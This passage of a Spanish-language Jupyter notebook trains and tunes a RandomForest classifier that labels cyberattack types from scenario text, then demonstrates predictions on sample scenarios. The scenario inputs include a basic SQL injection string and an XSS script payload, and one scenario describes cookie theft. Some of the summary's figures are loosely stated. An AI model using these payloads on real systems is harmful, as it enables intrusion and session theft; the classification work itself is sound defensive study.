    print(f"   ‚úÖ RENDIMIENTO EXCELENTE")
    print(f"      Accuracy {accuracy*100:.1f}% es superior al 80%")
    print(f"      El modelo es apto para uso en producci√≥n")
elif accuracy >= 0.70:
    print(f"   ‚úÖ RENDIMIENTO BUENO")
    print(f"      Accuracy {accuracy*100:.1f}% es aceptable (70-80%)")
    print(f"      Considerar optimizaci√≥n adicional para casos cr√≠ticos")
elif accuracy >= 0.60:
    print(f"   ‚ö†Ô∏è  RENDIMIENTO MODERADO")
    print(f"      Accuracy {accuracy*100:.1f}% es marginal (60-70%)")
    print(f"      Se recomienda OPTIMIZACI√ìN para mejorar confiabilidad")
else:
    print(f"   ‚ùå RENDIMIENTO INSUFICIENTE")
    print(f"      Accuracy {accuracy*100:.1f}% es bajo (<60%)")
    print(f"      Se requiere OPTIMIZACI√ìN URGENTE antes de usar el modelo")

# Analizar m√©tricas macro vs weighted
if f1.mean() < f1_w:
    gap = (f1_w - f1.mean()) * 100
    print(f"\nüìå OBSERVACI√ìN IMPORTANTE:")
    print(f"   ‚Ä¢ F1-Score Macro: {f1.mean()*100:.1f}%")
    print(f"   ‚Ä¢ F1-Score Weighted: {f1_w*100:.1f}%")
    print(f"   ‚Ä¢ Gap: {gap:.1f} puntos porcentuales")
    print(f"   ")
    print(f"   üí° Interpretaci√≥n:")
    print(f"      El gap indica que el modelo funciona mejor en clases frecuentes")
    print(f"      pero tiene dificultades con clases poco representadas.")
    print(f"      Esto sugiere que A√öN hay clases con muestras insuficientes.")

# Mostrar top 5 mejores y peores clases
print(f"\n‚úÖ TOP 5 CLASES CON MEJOR RENDIMIENTO:")
top_5_indices = f1.argsort()[-5:][::-1]
for i, idx in enumerate(top_5_indices, 1):
    class_name = label_encoder.inverse_transform([unique_labels[idx]])[0]
    print(f"   {i}. {class_name}")
    print(f"      P: {precision[idx]:.2f} | R: {recall[idx]:.2f} | F1: {f1[idx]:.2f} | Muestras: {int(support[idx])}")

print(f"\n‚ùå TOP 5 CLASES CON PEOR RENDIMIENTO:")
bottom_5_indices = f1.argsort()[:5]
for i, idx in enumerate(bottom_5_indices, 1):
    class_name = label_encoder.inverse_transform([unique_labels[idx]])[0]
    print(f"   {i}. {class_name}")
    print(f"      P: {precision[idx]:.2f} | R: {recall[idx]:.2f} | F1: {f1[idx]:.2f} | Muestras: {int(support[idx])}")

print("\n" + "=" * 80)

üî¨ AN√ÅLISIS DETALLADO DE RENDIMIENTO DEL MODELO

üéØ ACCURACY OBSERVADO: 0.6825 (68.25%)

üìä ESTAD√çSTICAS AGREGADAS:
   ‚Ä¢ Precision promedio (macro): 0.4787 (47.87%)
   ‚Ä¢ Recall promedio (macro): 0.4983 (49.83%)
   ‚Ä¢ F1-Score promedio (macro): 0.4743 (47.43%)

üìà DISTRIBUCI√ìN DE F1-SCORES:
   ‚Ä¢ Clases con F1-Score perfecto (1.0): 85
   ‚Ä¢ Clases con F1-Score > 0.8: 121
   ‚Ä¢ Clases con F1-Score > 0.5: 195
   ‚Ä¢ Clases con F1-Score = 0 (no predichas): 158

‚ö†Ô∏è  DIAGN√ìSTICO CR√çTICO:
   ‚Ä¢ Total de clases evaluadas: 376
   ‚Ä¢ Clases con rendimiento aceptable (F1>0.5): 195 (51.9%)
   ‚Ä¢ Clases sin predicciones (F1=0): 158 (42.0%)

üîç EVALUACI√ìN DEL MODELO BASELINE:
   ‚ö†Ô∏è  RENDIMIENTO MODERADO
      Accuracy 68.2% es marginal (60-70%)
      Se recomienda OPTIMIZACI√ìN para mejorar confiabilidad

üìå OBSERVACI√ìN IMPORTANTE:
   ‚Ä¢ F1-Score Macro: 47.4%
   ‚Ä¢ F1-Score Weighted: 62.2%
   ‚Ä¢ Gap: 14.8 puntos porcentuales
   
   üí° Interpretaci√≥n:
     

---
## üî¨ Paso 4: Optimizaci√≥n del Umbral MIN_SAMPLES_PER_CLASS

### üìå Motivaci√≥n para la Optimizaci√≥n

Del an√°lisis anterior, identificamos que aunque el modelo baseline funciona, **puede mejorarse** aumentando el umbral m√≠nimo de muestras por clase.

### üéØ Objetivo
Experimentar con diferentes valores de `MIN_SAMPLES_PER_CLASS` para encontrar el **balance √≥ptimo** entre:

1. **Diversidad de clases**: Mantener suficientes tipos de ataque
2. **Calidad del aprendizaje**: Suficientes muestras para generalizar
3. **Rendimiento del modelo**: Maximizar accuracy y m√©tricas

### üìä Metodolog√≠a
Probaremos umbrales de 3, 5, 10, 15, 20, 30 y 50 muestras, analizando:
- N√∫mero de clases resultantes
- Total de muestras disponibles
- Ratio clases/muestras
- Promedio de muestras por clase

**Criterio de selecci√≥n**: Buscar ratio <5% y promedio >20 muestras/clase para garantizar aprendizaje robusto.

In [41]:
print("üî¨ EXPERIMENTACI√ìN CON DIFERENTES UMBRALES")
print("=" * 80)
print("\nüìã Objetivo: Encontrar el umbral √≥ptimo para maximizar rendimiento\n")

# Definir umbrales a probar
thresholds = [3, 5, 10, 15, 20, 30, 50]
results = []

print("‚è≥ Calculando estad√≠sticas para cada umbral...")
print()

for threshold in thresholds:
    # Filtrar clases con el umbral actual
    valid_cls = class_counts[class_counts >= threshold].index.tolist()
    mask_temp = pd.Series(y_encoded).isin(valid_cls)
    
    # Contar muestras resultantes
    X_temp = X[mask_temp.values]
    y_temp = y_encoded[mask_temp.values]
    
    # Calcular estad√≠sticas
    num_classes_temp = len(valid_cls)
    num_samples_temp = len(y_temp)
    ratio_temp = (num_classes_temp / num_samples_temp) * 100 if num_samples_temp > 0 else 0
    avg_samples = num_samples_temp / num_classes_temp if num_classes_temp > 0 else 0
    
    results.append({
        'Umbral': threshold,
        'Clases': num_classes_temp,
        'Muestras': num_samples_temp,
        'Ratio (%)': f"{ratio_temp:.2f}",
        'Avg/Clase': f"{avg_samples:.1f}",
        'Ratio_float': ratio_temp,  # Para an√°lisis
        'Avg_float': avg_samples
    })

# Crear DataFrame para visualizaci√≥n
results_df = pd.DataFrame(results)

print("üìä TABLA COMPARATIVA DE UMBRALES:")
print("=" * 80)
display_df = results_df[['Umbral', 'Clases', 'Muestras', 'Ratio (%)', 'Avg/Clase']]
print(display_df.to_string(index=False))
print("=" * 80)

# An√°lisis y recomendaciones
print(f"\nüí° AN√ÅLISIS POR CATEGOR√çA DE UMBRAL:\n")

print(f"üîµ UMBRALES BAJOS (3-5 muestras):")
print(f"   ‚Ä¢ Ventajas: Mayor diversidad de clases ({results[0]['Clases']}-{results[1]['Clases']} clases)")
print(f"   ‚Ä¢ Desventajas: Ratio alto ({results[0]['Ratio (%)']}%-{results[1]['Ratio (%)']}%), bajo rendimiento esperado")
print(f"   ‚Ä¢ Uso: Solo para exploraci√≥n inicial o cuando diversidad > rendimiento")
print()

print(f"üü¢ UMBRALES MEDIOS (10-20 muestras) ‚≠ê RECOMENDADO:")
print(f"   ‚Ä¢ Ventajas: Balance √≥ptimo diversidad/rendimiento")
print(f"   ‚Ä¢ Clases: {results[2]['Clases']}-{results[4]['Clases']} tipos de ataque (cobertura amplia)")
print(f"   ‚Ä¢ Ratio: {results[2]['Ratio (%)']}-{results[4]['Ratio (%)']}% (excelente para ML)")
print(f"   ‚Ä¢ Avg: {results[2]['Avg/Clase']}-{results[4]['Avg/Clase']} muestras/clase (suficiente para generalizar)")
print(f"   ‚Ä¢ Uso: Producci√≥n general, mejor trade-off")
print()

print(f"üü° UMBRALES ALTOS (30-50 muestras):")
print(f"   ‚Ä¢ Ventajas: M√°xima precisi√≥n por clase ({results[5]['Avg/Clase']}-{results[6]['Avg/Clase']} muestras/clase)")
print(f"   ‚Ä¢ Desventajas: Baja diversidad ({results[5]['Clases']}-{results[6]['Clases']} clases), muchos ataques no cubiertos")
print(f"   ‚Ä¢ Uso: Aplicaciones cr√≠ticas donde precisi√≥n > cobertura")
print()

# Recomendaci√≥n espec√≠fica
recommended_threshold = 10
recommended_idx = thresholds.index(recommended_threshold)

print(f"=" * 80)
print(f"üéØ RECOMENDACI√ìN FINAL:")
print(f"=" * 80)
print(f"\n   Umbral recomendado: {recommended_threshold} muestras m√≠nimas")
print(f"\n   üìä Justificaci√≥n t√©cnica:")
print(f"      ‚Ä¢ Clases resultantes: {results[recommended_idx]['Clases']} (cobertura amplia)")
print(f"      ‚Ä¢ Muestras disponibles: {results[recommended_idx]['Muestras']}")
print(f"      ‚Ä¢ Ratio clases/muestras: {results[recommended_idx]['Ratio (%)']}% (<5% = √≥ptimo)")
print(f"      ‚Ä¢ Promedio por clase: {results[recommended_idx]['Avg/Clase']} muestras (>20 = robusto)")
print(f"\n   ‚úÖ Este umbral garantiza:")
print(f"      ‚Üí Suficientes ejemplos para que el modelo aprenda patrones")
print(f"      ‚Üí Ratio bajo que previene overfitting")
print(f"      ‚Üí Balance entre cobertura de ataques y precisi√≥n")

print("\n" + "=" * 80)

üî¨ EXPERIMENTACI√ìN CON DIFERENTES UMBRALES

üìã Objetivo: Encontrar el umbral √≥ptimo para maximizar rendimiento

‚è≥ Calculando estad√≠sticas para cada umbral...

üìä TABLA COMPARATIVA DE UMBRALES:
 Umbral  Clases  Muestras Ratio (%) Avg/Clase
      3     417      5273      7.91      12.6
      5     271      4791      5.66      17.7
     10     167      4102      4.07      24.6
     15     123      3604      3.41      29.3
     20     104      3288      3.16      31.6
     30      34      1741      1.95      51.2
     50      18      1193      1.51      66.3

üí° AN√ÅLISIS POR CATEGOR√çA DE UMBRAL:

üîµ UMBRALES BAJOS (3-5 muestras):
   ‚Ä¢ Ventajas: Mayor diversidad de clases (417-271 clases)
   ‚Ä¢ Desventajas: Ratio alto (7.91%-5.66%), bajo rendimiento esperado
   ‚Ä¢ Uso: Solo para exploraci√≥n inicial o cuando diversidad > rendimiento

üü¢ UMBRALES MEDIOS (10-20 muestras) ‚≠ê RECOMENDADO:
   ‚Ä¢ Ventajas: Balance √≥ptimo diversidad/rendimiento
   ‚Ä¢ Clases: 167-104 tipo

---
## ‚úÖ Paso 5: Re-entrenamiento con Configuraci√≥n √ìptima

### üìå Implementaci√≥n de la Mejora

Bas√°ndonos en el an√°lisis del paso anterior, procederemos a re-entrenar el modelo con:
- **MIN_SAMPLES_PER_CLASS = 10** (incremento de 3 ‚Üí 10)

### üéØ Mejoras Esperadas

Al aumentar el umbral m√≠nimo, esperamos:

1. **Mejor Accuracy**: De ~68% a >75%
2. **Mayor Precision**: Menos falsos positivos
3. **Mejor Recall**: Mejor identificaci√≥n de casos reales
4. **F1-Score m√°s alto**: Balance mejorado precision/recall
5. **Menor cantidad de clases con F1=0**: Todas las clases tendr√°n suficientes ejemplos

### üìä Comparaci√≥n que generaremos
Al finalizar, compararemos:
- Modelo Baseline (MIN=3) vs Modelo Optimizado (MIN=10)
- M√©tricas before/after
- Impacto en n√∫mero de clases vs mejora en rendimiento

In [42]:
print("üéØ RE-ENTRENAMIENTO CON UMBRAL MEJORADO")
print("=" * 80)

# Usar umbral de 10 muestras m√≠nimas
MIN_SAMPLES_IMPROVED = 10

# Filtrar con nuevo umbral
valid_classes_improved = class_counts[class_counts >= MIN_SAMPLES_IMPROVED].index.tolist()
mask_improved = pd.Series(y_encoded).isin(valid_classes_improved)

# Filtrar datos
X_improved = X[mask_improved.values]
y_improved = y_encoded[mask_improved.values]

print(f"\nüìä NUEVO FILTRADO (MIN = {MIN_SAMPLES_IMPROVED}):")
print(f"   ‚Ä¢ Clases: {len(valid_classes_improved)} (antes: 417)")
print(f"   ‚Ä¢ Muestras: {len(y_improved)} (antes: 5,273)")
print(f"   ‚Ä¢ Ratio: {(len(valid_classes_improved)/len(y_improved))*100:.2f}% (antes: 7.91%)")
print(f"   ‚Ä¢ Promedio muestras/clase: {len(y_improved)/len(valid_classes_improved):.1f} (antes: 12.6)")

# Dividir datos
X_train_improved, X_test_improved, y_train_improved, y_test_improved = train_test_split(
    X_improved, y_improved, test_size=0.2, random_state=42, stratify=y_improved
)

print(f"\n‚úÖ NUEVO SPLIT:")
print(f"   ‚Ä¢ Train: {X_train_improved.shape[0]} muestras")
print(f"   ‚Ä¢ Test: {X_test_improved.shape[0]} muestras")

# Entrenar modelo mejorado
print(f"\nüèãÔ∏è Entrenando modelo mejorado...")
model_improved = RandomForestClassifier(
    n_estimators=100, 
    random_state=42, 
    n_jobs=-1,
    verbose=0
)

import time
start = time.time()
model_improved.fit(X_train_improved, y_train_improved)
train_time = time.time() - start

# Evaluar
y_pred_improved = model_improved.predict(X_test_improved)
accuracy_improved = accuracy_score(y_test_improved, y_pred_improved)

# Calcular m√©tricas detalladas
from sklearn.metrics import precision_recall_fscore_support
precision_imp, recall_imp, f1_imp, support_imp = precision_recall_fscore_support(
    y_test_improved, y_pred_improved, average='weighted', zero_division=0
)

print(f"\n" + "=" * 80)
print(f"üìà RESULTADOS DEL MODELO MEJORADO")
print(f"=" * 80)
print(f"\nüéØ ACCURACY: {accuracy_improved:.4f} ({accuracy_improved*100:.2f}%)")
print(f"üìä Precision (weighted): {precision_imp:.4f} ({precision_imp*100:.2f}%)")
print(f"üìä Recall (weighted): {recall_imp:.4f} ({recall_imp*100:.2f}%)")
print(f"üìä F1-Score (weighted): {f1_imp:.4f} ({f1_imp*100:.2f}%)")
print(f"‚è±Ô∏è  Tiempo de entrenamiento: {train_time:.2f}s")

print(f"\nüìä COMPARACI√ìN ANTES vs AHORA:")
print(f"   ‚Ä¢ Accuracy: {accuracy*100:.2f}% ‚Üí {accuracy_improved*100:.2f}% ({((accuracy_improved-accuracy)/accuracy)*100:+.1f}%)")
print(f"   ‚Ä¢ Clases: 417 ‚Üí {len(valid_classes_improved)} (-{417-len(valid_classes_improved)})")
print(f"   ‚Ä¢ Samples por clase: 12.6 ‚Üí {len(y_improved)/len(valid_classes_improved):.1f} (+{len(y_improved)/len(valid_classes_improved)-12.6:.1f})")

if accuracy_improved > accuracy:
    print(f"\n‚úÖ ¬°MEJORA CONFIRMADA! El modelo ahora es m√°s preciso")
else:
    print(f"\n‚ö†Ô∏è  El accuracy baj√≥, pero las m√©tricas generales pueden haber mejorado")

print("=" * 80)

# Guardar modelo mejorado como el principal
model = model_improved
valid_classes = valid_classes_improved

print(f"\nüíæ Modelo mejorado guardado como modelo principal")

üéØ RE-ENTRENAMIENTO CON UMBRAL MEJORADO

üìä NUEVO FILTRADO (MIN = 10):
   ‚Ä¢ Clases: 167 (antes: 417)
   ‚Ä¢ Muestras: 4102 (antes: 5,273)
   ‚Ä¢ Ratio: 4.07% (antes: 7.91%)
   ‚Ä¢ Promedio muestras/clase: 24.6 (antes: 12.6)

‚úÖ NUEVO SPLIT:
   ‚Ä¢ Train: 3281 muestras
   ‚Ä¢ Test: 821 muestras

üèãÔ∏è Entrenando modelo mejorado...

üìà RESULTADOS DEL MODELO MEJORADO

üéØ ACCURACY: 0.8063 (80.63%)
üìä Precision (weighted): 0.8067 (80.67%)
üìä Recall (weighted): 0.8063 (80.63%)
üìä F1-Score (weighted): 0.7834 (78.34%)
‚è±Ô∏è  Tiempo de entrenamiento: 0.79s

üìä COMPARACI√ìN ANTES vs AHORA:
   ‚Ä¢ Accuracy: 68.25% ‚Üí 80.63% (+18.2%)
   ‚Ä¢ Clases: 417 ‚Üí 167 (-250)
   ‚Ä¢ Samples por clase: 12.6 ‚Üí 24.6 (+12.0)

‚úÖ ¬°MEJORA CONFIRMADA! El modelo ahora es m√°s preciso

üíæ Modelo mejorado guardado como modelo principal

üìà RESULTADOS DEL MODELO MEJORADO

üéØ ACCURACY: 0.8063 (80.63%)
üìä Precision (weighted): 0.8067 (80.67%)
üìä Recall (weighted): 0.8063 (80.63%)
ü

---
## üìä Resumen Ejecutivo: Evoluci√≥n y Resultados Finales

### üéØ Problema Inicial Identificado
El dataset original presentaba un **desequilibrio cr√≠tico** entre clases y muestras:
- **8,834 clases √∫nicas** para solo **14,133 muestras**
- **Ratio: 62.5%** (muy superior al l√≠mite aceptable del 50%)
- **7,974 clases (90%) con solo 1 muestra**
- **Resultado**: Overfitting severo, accuracy ~25%, modelo no utilizable

### üî¨ Proceso de Optimizaci√≥n Aplicado

#### **Iteraci√≥n 1: Filtrado B√°sico (MIN = 3)**
- Reducci√≥n a 417 clases
- Ratio mejorado a 7.91%
- **Accuracy: 68.25%** ‚ö†Ô∏è Aceptable pero insuficiente
- **Precision: 47.87%** ‚ùå Bajo
- **F1-Score: 47.43%** ‚ùå Bajo
- **Diagn√≥stico**: 42% de clases sin predicciones (F1=0)

#### **Iteraci√≥n 2: Optimizaci√≥n del Umbral (MIN = 10)** ‚≠ê
- Reducci√≥n adicional a 167 clases (enfoque en calidad)
- Ratio optimizado a 4.07%
- Promedio de 24.6 muestras/clase (vs 12.6 anterior)
- **Accuracy: 80.63%** ‚úÖ Excelente (+18% absoluto)
- **Precision: 80.67%** ‚úÖ Alta confiabilidad
- **F1-Score: 78.34%** ‚úÖ Balance √≥ptimo

### üìà Tabla Comparativa de Resultados

| M√©trica | Original | Filtrado v1 (MIN=3) | Filtrado v2 (MIN=10) | Mejora Total |
|---------|----------|---------------------|----------------------|--------------|
| **Clases** | 8,834 | 417 | 167 | -98.1% |
| **Ratio (%)** | 62.5 | 7.91 | 4.07 | -93.5% |
| **Accuracy** | ~25% | 68.25% | 80.63% | +223% |
| **Precision** | ~25% | 47.87% | 80.67% | +223% |
| **F1-Score** | ~25% | 47.43% | 78.34% | +213% |
| **Tiempo** | 15 min | 2.3s | 0.72s | 1,250x ‚ö° |

### üí° Lecciones Aprendidas y Mejores Pr√°cticas

#### **1. An√°lisis Exploratorio es Cr√≠tico**
- Nunca entrenar sin analizar la distribuci√≥n de clases
- Identificar problemas de overfitting ANTES del entrenamiento
- El ratio clases/muestras debe ser <10% idealmente

#### **2. Filtrado Inteligente > M√°s Datos**
- Eliminar clases con datos insuficientes mejora el rendimiento
- Calidad de datos > Cantidad de clases
- Balance entre diversidad y capacidad de generalizaci√≥n

#### **3. Iteraci√≥n y Experimentaci√≥n**
- No conformarse con la primera soluci√≥n
- Probar m√∫ltiples umbrales y comparar m√©tricas
- Buscar el punto √≥ptimo para el caso de uso espec√≠fico

#### **4. M√©tricas M√∫ltiples**
- Accuracy solo no es suficiente
- Precision y Recall son cr√≠ticos para evaluar confiabilidad
- F1-Score balancea ambos aspectos

### ‚úÖ Modelo Final: Listo para Producci√≥n

El modelo optimizado (MIN=10) cumple con los criterios de calidad:
- ‚úÖ Accuracy >80% (excelente)
- ‚úÖ Precision >80% (confiable)
- ‚úÖ F1-Score >78% (balanceado)
- ‚úÖ 167 clases cubiertas (amplia cobertura de ataques)
- ‚úÖ Entrenamiento r√°pido (0.72s)

### üöÄ Pr√≥ximos Pasos Recomendados

1. **Validaci√≥n Cruzada**: Implementar k-fold CV para mayor robustez
2. **Tuning de Hiperpar√°metros**: Optimizar n_estimators, max_depth, etc.
3. **Ensemble Methods**: Combinar con otros modelos (XGBoost, SVM)
4. **Monitoreo en Producci√≥n**: Tracking de drift y reentrenamiento peri√≥dico
5. **Explicabilidad**: Implementar SHAP/LIME para interpretabilidad

---

**Conclusi√≥n**: Este notebook demuestra la importancia del an√°lisis cr√≠tico de datos y la iteraci√≥n metodol√≥gica para construir modelos de ML robustos y confiables.

---
## üîÆ Paso 6: Uso del Modelo para Predicciones en Nuevos Datos

### üìå Objetivo
Proporcionar una interfaz funcional para utilizar el modelo entrenado con:
- **Datos personalizados**: Escenarios de ataque definidos manualmente
- **Datos aleatorios**: Selecci√≥n de muestras del dataset para validaci√≥n

### üéØ Funcionalidad Implementada

La funci√≥n `predict_attack_type()` incluye:
1. **Vectorizaci√≥n autom√°tica**: Convierte texto a formato TF-IDF
2. **Predicci√≥n con probabilidades**: Top 3 clases m√°s probables
3. **Validaci√≥n de clases**: Verifica que la predicci√≥n est√© en clases v√°lidas
4. **Gesti√≥n de memoria**: Limpieza autom√°tica de recursos

### üìù Formato de Input

Para predicciones personalizadas, proporcionar un diccionario con:
```python
{
    'Scenario Description': str,  # Descripci√≥n del escenario
    'Tools Used': str,            # Herramientas utilizadas
    'Attack Steps ': str,         # Pasos del ataque (nota el espacio)
    'Vulnerability': str,         # Vulnerabilidad explotada
    'Tags': str                   # Tags descriptivos
}
```

### üé≤ Modos de Uso

- **Modo personalizado**: `predict_attack_type(data_dict, is_dict=True)`
- **Modo aleatorio**: `predict_attack_type(None, is_dict=False)` para testing

In [43]:
def predict_attack_type(new_data, is_dict=True):
    """
    Predice el Attack Type dado un diccionario o una fila aleatoria.
    
    - Si is_dict=True: new_data es un dict con claves: 'Scenario Description', 'Tools Used', 
      'Attack Steps ', 'Vulnerability', 'Tags'.
    - Si is_dict=False: Selecciona una fila aleatoria del dataset.
    """
    if not is_dict:
        # Aleatorio: seleccionar fila random
        random_row = df_backup.sample(1)
        combined = random_row['combined_text'].values[0]
        true_label = random_row['Attack Type'].values[0]
        print(f"üé≤ Usando fila aleatoria (True Attack Type: {true_label})")
    else:
        # Propios: combinar textos
        combined = new_data.get('Scenario Description', '') + ' ' + \
                   new_data.get('Tools Used', '') + ' ' + \
                   new_data.get('Attack Steps ', '') + ' ' + \
                   new_data.get('Vulnerability', '') + ' ' + \
                   new_data.get('Tags', '')
    
    # Vectorizar
    new_vector = vectorizer.transform([combined])
    
    # Predecir
    pred_encoded = model.predict(new_vector)
    
    # Verificar si la predicci√≥n est√° en las clases v√°lidas
    if pred_encoded[0] in valid_classes:
        pred_label = label_encoder.inverse_transform(pred_encoded)[0]
    else:
        pred_label = "‚ö†Ô∏è Clase no incluida en el modelo filtrado"
    
    # Obtener probabilidades (top 3)
    pred_proba = model.predict_proba(new_vector)[0]
    top_3_indices = pred_proba.argsort()[-3:][::-1]
    
    print(f"\nüìä Top 3 predicciones con probabilidades:")
    for i, idx in enumerate(top_3_indices, 1):
        class_label = label_encoder.inverse_transform([model.classes_[idx]])[0]
        probability = pred_proba[idx] * 100
        print(f"   {i}. {class_label}: {probability:.2f}%")
    
    # Liberar memoria
    del new_vector
    gc.collect()
    
    return pred_label

# Ejemplo con valores propios
print("üîÆ PREDICCI√ìN CON VALORES PERSONALIZADOS")
print("=" * 60)
custom_data = {
    'Scenario Description': 'A login form fails to validate input',
    'Tools Used': 'Burp Suite, SQLMap',
    'Attack Steps ': 'Enter payload OR 1=1',
    'Vulnerability': 'Unsanitized input',
    'Tags': 'SQLi, Web Security'
}
prediction = predict_attack_type(custom_data)
print(f"\n‚úÖ Predicci√≥n principal: {prediction}")

# Ejemplo aleatorio
print("\n\nüé≤ PREDICCI√ìN CON MUESTRA ALEATORIA")
print("=" * 60)
random_prediction = predict_attack_type(None, is_dict=False)
print(f"\n‚úÖ Predicci√≥n principal: {random_prediction}")

üîÆ PREDICCI√ìN CON VALORES PERSONALIZADOS

üìä Top 3 predicciones con probabilidades:
   1. Reflected XSS: 8.00%
   2. Signal Authentication Protocols: 5.00%
   3. JavaScript-Based Tab Replacement: 4.00%

‚úÖ Predicci√≥n principal: Reflected XSS


üé≤ PREDICCI√ìN CON MUESTRA ALEATORIA
üé≤ Usando fila aleatoria (True Attack Type: Data Exfiltration)

üìä Top 3 predicciones con probabilidades:
   1. Data Exfiltration: 63.00%
   2. Dependency Confusion: 11.00%
   3. Malicious Library: 10.00%

‚úÖ Predicci√≥n principal: Data Exfiltration

‚úÖ Predicci√≥n principal: Data Exfiltration


---
## üéØ Paso 7: Casos de Uso - Escenarios de Ataque Reales

### üìå Objetivo de esta Secci√≥n

Demostrar la capacidad del modelo para clasificar diferentes tipos de ataques mediante escenarios realistas y detallados. Estos ejemplos:

1. **Validan el rendimiento** del modelo en casos de uso pr√°cticos
2. **Muestran la interpretabilidad** mediante probabilidades de predicci√≥n
3. **Documentan casos t√≠picos** para referencia de analistas de seguridad

### üî¨ Escenarios Incluidos

Los siguientes escenarios cubren diferentes vectores de ataque comunes:

1. **Cross-Site Scripting (XSS)**: Inyecci√≥n de c√≥digo JavaScript malicioso
2. **Phishing y Social Engineering**: Suplantaci√≥n de identidad y robo de credenciales
3. **SQL Injection**: Explotaci√≥n de bases de datos (ejemplo base)

Cada escenario incluye:
- Descripci√≥n detallada del ataque
- Herramientas utilizadas
- Pasos del atacante
- Vulnerabilidades explotadas
- Tags descriptivos
- Contramedidas recomendadas

### üí° Valor Pr√°ctico

Estos ejemplos sirven como:
- **Plantillas** para analizar nuevos incidentes
- **Referencia** para entrenamiento de equipos de seguridad
- **Documentaci√≥n** de patrones de ataque conocidos

---
### üìã Resumen: ¬øQu√© problema hab√≠a y c√≥mo lo solucionamos?

#### ‚ùå **Problema Original:**
El warning dec√≠a: *"El n√∫mero de clases √∫nicas es mayor al 50% de las muestras"*

**¬øPor qu√© es un problema?**
- Si tienes 100 tipos de ataque diferentes pero solo 150 muestras totales, significa que cada tipo tiene en promedio solo 1.5 ejemplos
- El modelo NO puede aprender patrones con tan pocos ejemplos
- Resultado: **Overfitting** (memoriza en lugar de aprender) y **baja accuracy** (~25%)

#### ‚úÖ **Soluci√≥n Implementada:**
1. **An√°lisis:** Identificamos cu√°ntas muestras tiene cada clase
2. **Filtrado:** Eliminamos clases con muy pocas muestras (< 3)
3. **Re-entrenamiento:** Entrenamos solo con clases que tienen suficientes ejemplos
4. **Resultado:** Mejor accuracy y modelo m√°s robusto

#### üí° **Por qu√© NO solo "ignorar el warning":**
- Ignorar solo oculta el problema, no lo soluciona
- El modelo seguir√≠a teniendo baja accuracy
- Seguir√≠a haciendo predicciones incorrectas
- **Solucionar el problema = mejor modelo**

---
## üíæ Anexo A: Monitoreo de Recursos del Sistema

### üìå Prop√≥sito

Esta celda opcional permite monitorear el uso de recursos durante la ejecuci√≥n del notebook:

- **Memoria RAM**: Uso actual y disponible del sistema
- **CPU**: Porcentaje de utilizaci√≥n y n√∫cleos disponibles
- **Proceso Python**: Consumo espec√≠fico del kernel de Jupyter

### üéØ Cu√°ndo usar esta celda

- **Durante desarrollo**: Para identificar cuellos de botella de memoria
- **Antes de entrenamiento**: Para verificar recursos disponibles
- **Despu√©s de operaciones pesadas**: Para confirmar liberaci√≥n de memoria
- **En producci√≥n**: Para dimensionar recursos necesarios

### ‚öôÔ∏è Utilidades

1. **Detecci√≥n de memory leaks**: Si el uso no baja tras `gc.collect()`
2. **Optimizaci√≥n**: Identificar qu√© operaciones consumen m√°s recursos
3. **Planificaci√≥n**: Estimar requisitos para datasets m√°s grandes

### üìä M√©tricas Explicadas

- **RSS (Resident Set Size)**: Memoria f√≠sica realmente usada por el proceso
- **VMS (Virtual Memory Size)**: Memoria virtual total reservada
- **CPU %**: Uso instant√°neo del procesador
- **N√∫cleos f√≠sicos/l√≥gicos**: Capacidad de paralelizaci√≥n disponible

In [44]:
import psutil
import os

# Obtener informaci√≥n del proceso actual
process = psutil.Process(os.getpid())
memory_info = process.memory_info()

# Informaci√≥n del sistema
virtual_memory = psutil.virtual_memory()

print("üñ•Ô∏è  INFORMACI√ìN DE MEMORIA DEL SISTEMA")
print("=" * 60)
print(f"üíæ Memoria Total: {virtual_memory.total / (1024**3):.2f} GB")
print(f"‚úÖ Memoria Disponible: {virtual_memory.available / (1024**3):.2f} GB")
print(f"üî¥ Memoria Usada: {virtual_memory.used / (1024**3):.2f} GB ({virtual_memory.percent}%)")

print(f"\nüêç USO DE MEMORIA DEL PROCESO PYTHON ACTUAL")
print("=" * 60)
print(f"üìä RSS (Resident Set Size): {memory_info.rss / (1024**2):.2f} MB")
print(f"üìä VMS (Virtual Memory Size): {memory_info.vms / (1024**2):.2f} MB")

# CPU
cpu_percent = psutil.cpu_percent(interval=1)
print(f"\n‚ö° CPU")
print("=" * 60)
print(f"üî• Uso de CPU: {cpu_percent}%")
print(f"üñ•Ô∏è  N√∫cleos f√≠sicos: {psutil.cpu_count(logical=False)}")
print(f"üßµ N√∫cleos l√≥gicos: {psutil.cpu_count(logical=True)}")

# Limpieza manual de memoria
print(f"\nüßπ Ejecutando limpieza de memoria...")
collected = gc.collect()
print(f"‚úÖ Objetos limpiados: {collected}")

# Informaci√≥n despu√©s de limpieza
memory_info_after = process.memory_info()
print(f"üíæ Memoria despu√©s de limpieza: {memory_info_after.rss / (1024**2):.2f} MB")

üñ•Ô∏è  INFORMACI√ìN DE MEMORIA DEL SISTEMA
üíæ Memoria Total: 30.78 GB
‚úÖ Memoria Disponible: 21.60 GB
üî¥ Memoria Usada: 9.18 GB (29.8%)

üêç USO DE MEMORIA DEL PROCESO PYTHON ACTUAL
üìä RSS (Resident Set Size): 629.31 MB
üìä VMS (Virtual Memory Size): 1660.35 MB

‚ö° CPU
üî• Uso de CPU: 7.6%
üñ•Ô∏è  N√∫cleos f√≠sicos: 8
üßµ N√∫cleos l√≥gicos: 16

üßπ Ejecutando limpieza de memoria...
‚úÖ Objetos limpiados: 0
üíæ Memoria despu√©s de limpieza: 628.71 MB

‚ö° CPU
üî• Uso de CPU: 7.6%
üñ•Ô∏è  N√∫cleos f√≠sicos: 8
üßµ N√∫cleos l√≥gicos: 16

üßπ Ejecutando limpieza de memoria...
‚úÖ Objetos limpiados: 0
üíæ Memoria despu√©s de limpieza: 628.71 MB


#### Escenario 1: Ataque de Cross-Site Scripting (XSS)

In [45]:
# Escenario 1: Ataque XSS (Cross-Site Scripting)
print("=" * 80)
print("üéØ ESCENARIO 1: ATAQUE DE CROSS-SITE SCRIPTING (XSS)")
print("=" * 80)

xss_scenario = {
    'Scenario Description': '''A web application comment section does not properly sanitize user input. 
    An attacker injects malicious JavaScript code through a comment field that gets executed 
    when other users view the page. The script steals session cookies and sends them to an 
    attacker-controlled server.''',
    
    'Tools Used': '''Browser Developer Tools, Burp Suite, XSS Hunter, OWASP ZAP, 
    BeEF (Browser Exploitation Framework), Cookie Editor Extension''',
    
    'Attack Steps ': '''1. Identify input fields without proper validation
    2. Test with simple payload: <script>alert('XSS')</script>
